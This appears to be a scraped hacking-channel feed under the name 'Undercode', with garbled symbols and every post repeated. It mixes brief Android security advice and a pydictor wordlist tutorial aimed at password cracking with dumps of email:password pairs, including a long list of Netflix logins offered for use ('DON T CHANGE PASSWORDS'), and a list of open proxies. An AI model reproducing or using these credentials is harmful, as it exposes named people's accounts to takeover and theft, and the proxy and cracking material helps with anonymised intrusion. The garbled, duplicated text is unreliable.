π¦Three major hacking threats to Android by undercode :
1) Data in transit: Android devices and mobile devices are often particularly vulnerable because they only use wireless communication and often use public WiFi, which may be unsafe. The attack often used by hackers is a man-in-the-middle attack.
> The attacker breaks into the device and redirects the data to use the resources on it, and then forwards it to the original target. This method allows hackers to monitor Internet browsing activity, steal keystrokes to identify passwords and isolate individuals' physical locations, and possibly listen to calls and block text.
2) Third-party apps: In a recent study, 57% of malicious apps in the Android market were found in third-party app stores.
3) SMS Trojan Horse: By including advanced dialing features in the Trojan Horse application, an attacker can run the victim's phone bill and have the mobile operator collect and distribute funds to them. Another malicious use of SMS involves using an infected device to send SMS text messages to all contacts in the address book, which contains links that trick the recipient to download and install the worm, infecting many devices at once.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ You can take three steps to protect your Android device :
1) SSL encryption of the device: SSL is one of the best ways to protect sensitive data in transit.
2) Test third-party apps: Try to install apps from first-party vendors such as Google. If you do purchase the application from a third-party store, please use the mobile security vendor to audit the security / authenticity of any third-party code / library used in the mobile application. Read the permissions required by the application before downloading. Examples of applications that a permission application can request may trigger red flags are permission to disclose your identity or location or send mail to the Internet.
3) Be wary of SMS Trojan horses: implement control measures to prevent unauthorized access to paid resources. If you request payment via SMS, please proceed with caution.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ You can take three steps to protect your Android device :
1) SSL encryption of the device: SSL is one of the best ways to protect sensitive data in transit.
2) Test third-party apps: Try to install apps from first-party vendors such as Google. If you do purchase the application from a third-party store, please use the mobile security vendor to audit the security / authenticity of any third-party code / library used in the mobile application. Read the permissions required by the application before downloading. Examples of applications that a permission application can request may trigger red flags are permission to disclose your identity or location or send mail to the Internet.
3) Be wary of SMS Trojan horses: implement control measures to prevent unauthorized access to paid resources. If you request payment via SMS, please proceed with caution.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Pydictor's create a great wordlist for hack :
> This is a special tool because it is the only tool that creates word lists in ordinary words and base64 encryption.
> Therefore, if someone is smart enough to maintain a secure password, this tool will help you. Pydictor is written in python. There are two ways to use this tool to crack passwords: one to create a normal wordlist, and the other to create a base64 form of wordlist.
> We will try these two methods. But first of all, this is a third-party tool, so we must install it, for this please enter:
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https : // github . Com / LandGrey / pydictor . Git
2) Once the tool is installed and ready to use, give instructions according to the instructions you want it to generate a word list. First understand the syntax:
3) . / Pydictor . Py - len < min > < max > - Base D - O < path >
./pydictor.py-launch the tool
-len- indicates the length of the character
<min> -Here, the minimum character length is given
<max> -Here, the maximum character length is given
-o- indicates the path
<path> -Here, provide the path where you want to save the wordlist
Let us now give a command to generate a list of words:
. / Pydictor . Py - len 5 5 - Base d - O / root / Desktop / dict . TXT
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Pydictor's create a great wordlist for hack :
> This is a special tool because it is the only tool that creates word lists in ordinary words and base64 encryption.
> Therefore, if someone is smart enough to maintain a secure password, this tool will help you. Pydictor is written in python. There are two ways to use this tool to crack passwords: one to create a normal wordlist, and the other to create a base64 form of wordlist.
> We will try these two methods. But first of all, this is a third-party tool, so we must install it, for this please enter:
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https : // github . Com / LandGrey / pydictor . Git
2) Once the tool is installed and ready to use, give instructions according to the instructions you want it to generate a word list. First understand the syntax:
3) . / Pydictor . Py - len < min > < max > - Base D - O < path >
./pydictor.py-launch the tool
-len- indicates the length of the character
<min> -Here, the minimum character length is given
<max> -Here, the maximum character length is given
-o- indicates the path
<path> -Here, provide the path where you want to save the wordlist
Let us now give a command to generate a list of words:
. / Pydictor . Py - len 5 5 - Base d - O / root / Desktop / dict . TXT
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
akdavis@seidata.com:Grinnell2012
emil-lauzon@hotmail.com:Batman6421
cwolfe12898@gmail.com:arma12898
evil_knight69@hotmail.com:Dargo123
jeremy.chappell2@gmail.com:Chappell88
wellnitz10@gmail.com:password16
ricardovdoort@gmail.com:ToY25092000
roguefeebo@yahoo.com:Morgan107
gpxdiamonds@gmail.com:Cu3rv02251
π¦tested @UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
emil-lauzon@hotmail.com:Batman6421
cwolfe12898@gmail.com:arma12898
evil_knight69@hotmail.com:Dargo123
jeremy.chappell2@gmail.com:Chappell88
wellnitz10@gmail.com:password16
ricardovdoort@gmail.com:ToY25092000
roguefeebo@yahoo.com:Morgan107
gpxdiamonds@gmail.com:Cu3rv02251
π¦tested @UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ New Netflix Accounts TESTED Β» DON T CHANGE PASSWORDS !!!!! :
sbentley97@yahoo.com:kendall07 | Standard
kelliryoung18@yahoo.com:ky012890 | Standard
miller_geo@yahoo.com:windom | Standard
dream4life342@yahoo.com:123bones | Standard
javil.seaton@yahoo.com:netwet2323 | Standard
lrayniak@yahoo.com:kittensk1 | Standard
cpdevelopers@yahoo.com:gold379 | Standard
jonahhunt@yahoo.com:jackdaniels | Standard
dafbs1977@yahoo.com:oc505900 | Standard
eddygarcia1967@yahoo.com:death2all | Standard
minsue232@yahoo.com:0chase3 | Standard
satish_maduri2002@yahoo.com:silverline | Standard
Hurricanej1993@yahoo.com:Jdmda1993 | Standard
daniels_cheyenne@yahoo.com:david05 | Basic
tash1985_12@yahoo.com:lgn2007b | Premium
dawn.fougere@yahoo.ca:Hunter14 | Standard
ayushdad@yahoo.com:martha1$ | Standard
abelpreci@yahoo.com:corvette | Standard
protectwildhorses@yahoo.com:br4tzb4by | Standard
daddyp29@yahoo.com:jamband | Premium
tivonda@yahoo.com:teejay | Standard
changjenny95@yahoo.com.tw:k50404050 | Standard
scheurersteven@yahoo.com:Steveo19 | Standard
krystal_schulte@yahoo.com:sparkles182 | Standard
tsuzi2005@yahoo.com:go2here | Standard
megan_oc@yahoo.com:silve9r | Standard
pereiravdb@yahoo.com.br:moki77 | PadrΓ£o
staceerohn@yahoo.com:court12 | Premium
anthonyp2859@yahoo.com:aap2859 | Standard
gem.mago@yahoo.com:agom1975 | Premium
billiedunn123@yahoo.com:richard1 | Standard
kaeleejae@yahoo.com:120970 | Premium
blueskyrabbitry@yahoo.com:boogaboo1205 | Standard
maggiemaesbackup@yahoo.com:alabama08 | Premium
erin.denton@yahoo.com.au:191189 | Standard
verum105@yahoo.com:Blondon24 | Standard
shaunmyburgh@yahoo.com:blackcat | Premium
jones.dustin82@yahoo.com:sound1wave | Standard
kaskhaanthony@yahoo.com:kst1535 | Standard
josh.butler1066@yahoo.com:farmall | Standard
kimkesling@yahoo.com:Kt101001 | Premium
lilandria_s@yahoo.com:haruka | Standard
kristee727@yahoo.com:travel | Standard
jsd061984@yahoo.com:june2306 | Standard
herrvisa@yahoo.com:g0atr0pe | Standard
abunton7100@yahoo.com:amberpoo | Basic
dominiquejones17@yahoo.com:65606560 | Standard
a1cberry_asm@yahoo.com:77camaro | Standard
laurafettig02@yahoo.com:Lfettig9849 | Standard
sjhalltenn@yahoo.com:travel | Standard
sp3ctre31@yahoo.com:bobsters31 | Standard
philip64485@yahoo.com:gracie64469 | Basic
lkincaid62@yahoo.com:pudding | Standard
md2hanif@yahoo.com:noppi123 | Standard
tonyw6568@yahoo.com:volsr1 | Premium
cesarepm69@yahoo.com.br:tracatra | PadrΓ£o
stormcraz@yahoo.com:taylor73 | Standard
nannayoyo@yahoo.com:120480 | Standard
babybluetwu@yahoo.com:twoblue2 | Basic
jaguevi@yahoo.com:Arma6757 | Standard
mariana_monna@yahoo.com.br:19512311 | PadrΓ£o
fianne9999@yahoo.com:fred1234 | Standard
fulmenus_2000@yahoo.com:st96h645 | Standard
MALLO12Y_N@yahoo.com:mmn4563 | Basic
siobhan_mcnab@yahoo.com:cerysbaby1 | Standard
michaelrcaskey@yahoo.com:bianca01 | Standard
seidi100@yahoo.com:lukas1 | Standard
robinlorenish@yahoo.com:snickers | Basic
andrewporto@yahoo.com:oracle11 | Standard
foryulia@yahoo.com:kozel926 | Standard
cssdy_mlss@yahoo.com:purju227 | Standard
tmsinetown@yahoo.com:cooper | Standard
nadineocker@yahoo.com:1Xterra2 | Standard
ansley.white@yahoo.com:MCRmy!81112 | Standard
gaikann@yahoo.com:lemontea456 | Standard
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ New Netflix Accounts TESTED Β» DON T CHANGE PASSWORDS !!!!! :
sbentley97@yahoo.com:kendall07 | Standard
kelliryoung18@yahoo.com:ky012890 | Standard
miller_geo@yahoo.com:windom | Standard
dream4life342@yahoo.com:123bones | Standard
javil.seaton@yahoo.com:netwet2323 | Standard
lrayniak@yahoo.com:kittensk1 | Standard
cpdevelopers@yahoo.com:gold379 | Standard
jonahhunt@yahoo.com:jackdaniels | Standard
dafbs1977@yahoo.com:oc505900 | Standard
eddygarcia1967@yahoo.com:death2all | Standard
minsue232@yahoo.com:0chase3 | Standard
satish_maduri2002@yahoo.com:silverline | Standard
Hurricanej1993@yahoo.com:Jdmda1993 | Standard
daniels_cheyenne@yahoo.com:david05 | Basic
tash1985_12@yahoo.com:lgn2007b | Premium
dawn.fougere@yahoo.ca:Hunter14 | Standard
ayushdad@yahoo.com:martha1$ | Standard
abelpreci@yahoo.com:corvette | Standard
protectwildhorses@yahoo.com:br4tzb4by | Standard
daddyp29@yahoo.com:jamband | Premium
tivonda@yahoo.com:teejay | Standard
changjenny95@yahoo.com.tw:k50404050 | Standard
scheurersteven@yahoo.com:Steveo19 | Standard
krystal_schulte@yahoo.com:sparkles182 | Standard
tsuzi2005@yahoo.com:go2here | Standard
megan_oc@yahoo.com:silve9r | Standard
pereiravdb@yahoo.com.br:moki77 | PadrΓ£o
staceerohn@yahoo.com:court12 | Premium
anthonyp2859@yahoo.com:aap2859 | Standard
gem.mago@yahoo.com:agom1975 | Premium
billiedunn123@yahoo.com:richard1 | Standard
kaeleejae@yahoo.com:120970 | Premium
blueskyrabbitry@yahoo.com:boogaboo1205 | Standard
maggiemaesbackup@yahoo.com:alabama08 | Premium
erin.denton@yahoo.com.au:191189 | Standard
verum105@yahoo.com:Blondon24 | Standard
shaunmyburgh@yahoo.com:blackcat | Premium
jones.dustin82@yahoo.com:sound1wave | Standard
kaskhaanthony@yahoo.com:kst1535 | Standard
josh.butler1066@yahoo.com:farmall | Standard
kimkesling@yahoo.com:Kt101001 | Premium
lilandria_s@yahoo.com:haruka | Standard
kristee727@yahoo.com:travel | Standard
jsd061984@yahoo.com:june2306 | Standard
herrvisa@yahoo.com:g0atr0pe | Standard
abunton7100@yahoo.com:amberpoo | Basic
dominiquejones17@yahoo.com:65606560 | Standard
a1cberry_asm@yahoo.com:77camaro | Standard
laurafettig02@yahoo.com:Lfettig9849 | Standard
sjhalltenn@yahoo.com:travel | Standard
sp3ctre31@yahoo.com:bobsters31 | Standard
philip64485@yahoo.com:gracie64469 | Basic
lkincaid62@yahoo.com:pudding | Standard
md2hanif@yahoo.com:noppi123 | Standard
tonyw6568@yahoo.com:volsr1 | Premium
cesarepm69@yahoo.com.br:tracatra | PadrΓ£o
stormcraz@yahoo.com:taylor73 | Standard
nannayoyo@yahoo.com:120480 | Standard
babybluetwu@yahoo.com:twoblue2 | Basic
jaguevi@yahoo.com:Arma6757 | Standard
mariana_monna@yahoo.com.br:19512311 | PadrΓ£o
fianne9999@yahoo.com:fred1234 | Standard
fulmenus_2000@yahoo.com:st96h645 | Standard
MALLO12Y_N@yahoo.com:mmn4563 | Basic
siobhan_mcnab@yahoo.com:cerysbaby1 | Standard
michaelrcaskey@yahoo.com:bianca01 | Standard
seidi100@yahoo.com:lukas1 | Standard
robinlorenish@yahoo.com:snickers | Basic
andrewporto@yahoo.com:oracle11 | Standard
foryulia@yahoo.com:kozel926 | Standard
cssdy_mlss@yahoo.com:purju227 | Standard
tmsinetown@yahoo.com:cooper | Standard
nadineocker@yahoo.com:1Xterra2 | Standard
ansley.white@yahoo.com:MCRmy!81112 | Standard
gaikann@yahoo.com:lemontea456 | Standard
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PREMIUM PROXIES CHECKED BY UNDERCODERS :
118.69.50.154:80 anonymous Apr-19, 16:01 Vietnam Ho Chi Minh City FPT Telecom
203.19.92.3:80 anonymous Apr-19, 15:37 Australia Kahibah Tomago Aluminiu...
203.19.88.59:80 anonymous Apr-19, 01:01 Australia Kahibah Tomago Aluminiu...
37.120.192.154:8080 anonymous Apr-19, 02:13 Netherlands Amsterdam Secure Data Sys...
51.158.98.121:8811 anonymous Apr-19, 20:50 France Paris Department for ...
51.158.123.250:8811 anonymous Apr-18, 23:02 France Paris Department for ...
165.255.73.128:53281 elite Apr-19, 06:26 South Africa Johannesburg Axxess Networks
103.83.116.3:55443 elite Apr-19, 20:06 Indonesia
91.230.44.133:3128 elite Apr-19, 13:12 Slovakia Bratislava ASITPRO
202.147.207.253:38646 elite Apr-18, 22:09 Indonesia Jakarta MNC Playmedia
94.229.32.85:3128 elite Apr-19, 04:10 Slovakia Dunajska Luzna DataNetworks s....
158.255.249.58:38914 elite Apr-19, 19:15 Slovakia PreΕ‘ov PRESNET s.r.o.
41.79.197.150:8080 elite Apr-18, 21:40 Somalia Merca Somcable
188.156.240.240:8118 elite Apr-19, 15:08 Hungary Szeged Magyar Telekom
102.164.214.225:55034 elite Apr-19, 15:49 South Africa Leslie
185.63.46.205:57100 elite Apr-19, 00:34 Hungary Hodmezovasarhely MVM Partner Ene...
85.159.48.170:40014 elite Apr-19, 09:31 Hungary Com.unique Tele...
94.21.118.140:48322 elite Apr-19, 07:11 Hungary Paszto DIGI Tavkozlesi...
91.82.49.138:57560 elite Apr-19, 13:17 Hungary Apostag Invitel Tavkozl...
102.164.202.80:34934 elite Apr-19, 09:10 South Africa Volksrust
78.41.174.196:8081 elite Apr-19, 07:11 Slovakia Horny Bar RadioLAN
36.55.230.146:8888 elite Apr-19, 00:19 Japan Kanazawa FreeBit Co.,Ltd.
126.29.117.191:80 elite Apr-19, 01:06 Japan Iwata Softbank BB Corp
61.118.35.94:55725 elite Apr-19, 19:07 Japan Tokyo NTT
124.219.176.139:39589 elite Apr-19, 19:12 Japan Chiba Sony Network Co...
74.116.59.8:53281 elite Apr-19, 15:30 Jamaica Island Networks
81.174.11.159:31194 elite Apr-18, 22:09 Italy NGI SpA
185.25.206.192:8080 elite Apr-19, 16:01 Italy Servereasy di G...
147.91.111.133:37979 elite Apr-19, 01:09 Serbia Akademska mreza...
212.43.123.18:41258 elite Apr-19, 01:11 Italy Basciano Quipo
192.117.146.110:80 elite Apr-19, 00:55 Israel Haifa 012 Smile
82.166.105.66:44081 elite Apr-19, 07:24 Israel Gannot 013 NetVision
52.31.193.74:8118 elite Apr-19, 07:02 Ireland Dublin Amazon Technolo...
185.138.123.78:55337 elite Apr-19, 19:24 Iraq Horizon Scope M...
5.160.240.201:53281 elite Apr-19, 06:11 Iran, Islamic Republic of Respina Network...
91.106.86.212:8080 elite Apr-18, 22:09 Iran, Islamic Republic of PJSC Badr Rayan...
94.229.32.86:3128 elite Apr-19, 07:03 Slovakia Dunajska Luzna DataNetworks s....
159.138.1.185:80 elite Apr-19, 09:22 Singapore Rouge Steel Co.
47.90.54.45:8080 elite Apr-19, 12:30 Hong Kong Alibaba
58.153.226.151:8080 elite Apr-19, 09:29 Hong Kong Kowloon Netvigator
84.75.4.177:80 elite Apr-19, 19:06 Switzerland Lenzburg upc cablecom GmbH
41.139.9.47:8080 elite Apr-19, 19:06 Ghana Accra Teledata ICT Ltd
94.130.179.24:8017 elite Apr-19, 18:39 Germany Gera D2 Internationa...
178.63.246.83:8118 elite Apr-19, 13:03 Germany Hetzner Online ...
94.130.179.24:8010 elite Apr-19, 00:54 Germany Gera D2 Internationa...
94.130.179.24:8026 elite Apr-19, 12:53 Germany Gera D2 Internationa...
94.130.179.24:8047 elite Apr-19, 06:43 Germany Gera D2 Internationa...
106.104.151.142:58198 elite Apr-18, 21:32 Taiwan Taipei New Century Inf...
178.134.155.82:48146 elite Apr-19, 00:35 Georgia Tbilisi JSC Silknet
212.72.159.22:30323 elite Apr-18, 22:08 Georgia Tbilisi Caucasus Online...
122.116.1.83:38680 elite Apr-19, 20:05 Taiwan Taoyuan District HiNet
188.169.123.54:8080 elite Apr-19, 04:05 Georgia Tbilisi JSC Silknet
37.187.4.81:8118 elite Apr-19, 06:17 France OVH SAS
π¦PREMIUM PROXIES CHECKED BY UNDERCODERS :
118.69.50.154:80 anonymous Apr-19, 16:01 Vietnam Ho Chi Minh City FPT Telecom
203.19.92.3:80 anonymous Apr-19, 15:37 Australia Kahibah Tomago Aluminiu...
203.19.88.59:80 anonymous Apr-19, 01:01 Australia Kahibah Tomago Aluminiu...
37.120.192.154:8080 anonymous Apr-19, 02:13 Netherlands Amsterdam Secure Data Sys...
51.158.98.121:8811 anonymous Apr-19, 20:50 France Paris Department for ...
51.158.123.250:8811 anonymous Apr-18, 23:02 France Paris Department for ...
165.255.73.128:53281 elite Apr-19, 06:26 South Africa Johannesburg Axxess Networks
103.83.116.3:55443 elite Apr-19, 20:06 Indonesia
91.230.44.133:3128 elite Apr-19, 13:12 Slovakia Bratislava ASITPRO
202.147.207.253:38646 elite Apr-18, 22:09 Indonesia Jakarta MNC Playmedia
94.229.32.85:3128 elite Apr-19, 04:10 Slovakia Dunajska Luzna DataNetworks s....
158.255.249.58:38914 elite Apr-19, 19:15 Slovakia PreΕ‘ov PRESNET s.r.o.
41.79.197.150:8080 elite Apr-18, 21:40 Somalia Merca Somcable
188.156.240.240:8118 elite Apr-19, 15:08 Hungary Szeged Magyar Telekom
102.164.214.225:55034 elite Apr-19, 15:49 South Africa Leslie
185.63.46.205:57100 elite Apr-19, 00:34 Hungary Hodmezovasarhely MVM Partner Ene...
85.159.48.170:40014 elite Apr-19, 09:31 Hungary Com.unique Tele...
94.21.118.140:48322 elite Apr-19, 07:11 Hungary Paszto DIGI Tavkozlesi...
91.82.49.138:57560 elite Apr-19, 13:17 Hungary Apostag Invitel Tavkozl...
102.164.202.80:34934 elite Apr-19, 09:10 South Africa Volksrust
78.41.174.196:8081 elite Apr-19, 07:11 Slovakia Horny Bar RadioLAN
36.55.230.146:8888 elite Apr-19, 00:19 Japan Kanazawa FreeBit Co.,Ltd.
126.29.117.191:80 elite Apr-19, 01:06 Japan Iwata Softbank BB Corp
61.118.35.94:55725 elite Apr-19, 19:07 Japan Tokyo NTT
124.219.176.139:39589 elite Apr-19, 19:12 Japan Chiba Sony Network Co...
74.116.59.8:53281 elite Apr-19, 15:30 Jamaica Island Networks
81.174.11.159:31194 elite Apr-18, 22:09 Italy NGI SpA
185.25.206.192:8080 elite Apr-19, 16:01 Italy Servereasy di G...
147.91.111.133:37979 elite Apr-19, 01:09 Serbia Akademska mreza...
212.43.123.18:41258 elite Apr-19, 01:11 Italy Basciano Quipo
192.117.146.110:80 elite Apr-19, 00:55 Israel Haifa 012 Smile
82.166.105.66:44081 elite Apr-19, 07:24 Israel Gannot 013 NetVision
52.31.193.74:8118 elite Apr-19, 07:02 Ireland Dublin Amazon Technolo...
185.138.123.78:55337 elite Apr-19, 19:24 Iraq Horizon Scope M...
5.160.240.201:53281 elite Apr-19, 06:11 Iran, Islamic Republic of Respina Network...
91.106.86.212:8080 elite Apr-18, 22:09 Iran, Islamic Republic of PJSC Badr Rayan...
94.229.32.86:3128 elite Apr-19, 07:03 Slovakia Dunajska Luzna DataNetworks s....
159.138.1.185:80 elite Apr-19, 09:22 Singapore Rouge Steel Co.
47.90.54.45:8080 elite Apr-19, 12:30 Hong Kong Alibaba
58.153.226.151:8080 elite Apr-19, 09:29 Hong Kong Kowloon Netvigator
84.75.4.177:80 elite Apr-19, 19:06 Switzerland Lenzburg upc cablecom GmbH
41.139.9.47:8080 elite Apr-19, 19:06 Ghana Accra Teledata ICT Ltd
94.130.179.24:8017 elite Apr-19, 18:39 Germany Gera D2 Internationa...
178.63.246.83:8118 elite Apr-19, 13:03 Germany Hetzner Online ...
94.130.179.24:8010 elite Apr-19, 00:54 Germany Gera D2 Internationa...
94.130.179.24:8026 elite Apr-19, 12:53 Germany Gera D2 Internationa...
94.130.179.24:8047 elite Apr-19, 06:43 Germany Gera D2 Internationa...
106.104.151.142:58198 elite Apr-18, 21:32 Taiwan Taipei New Century Inf...
178.134.155.82:48146 elite Apr-19, 00:35 Georgia Tbilisi JSC Silknet
212.72.159.22:30323 elite Apr-18, 22:08 Georgia Tbilisi Caucasus Online...
122.116.1.83:38680 elite Apr-19, 20:05 Taiwan Taoyuan District HiNet
188.169.123.54:8080 elite Apr-19, 04:05 Georgia Tbilisi JSC Silknet
37.187.4.81:8118 elite Apr-19, 06:17 France OVH SAS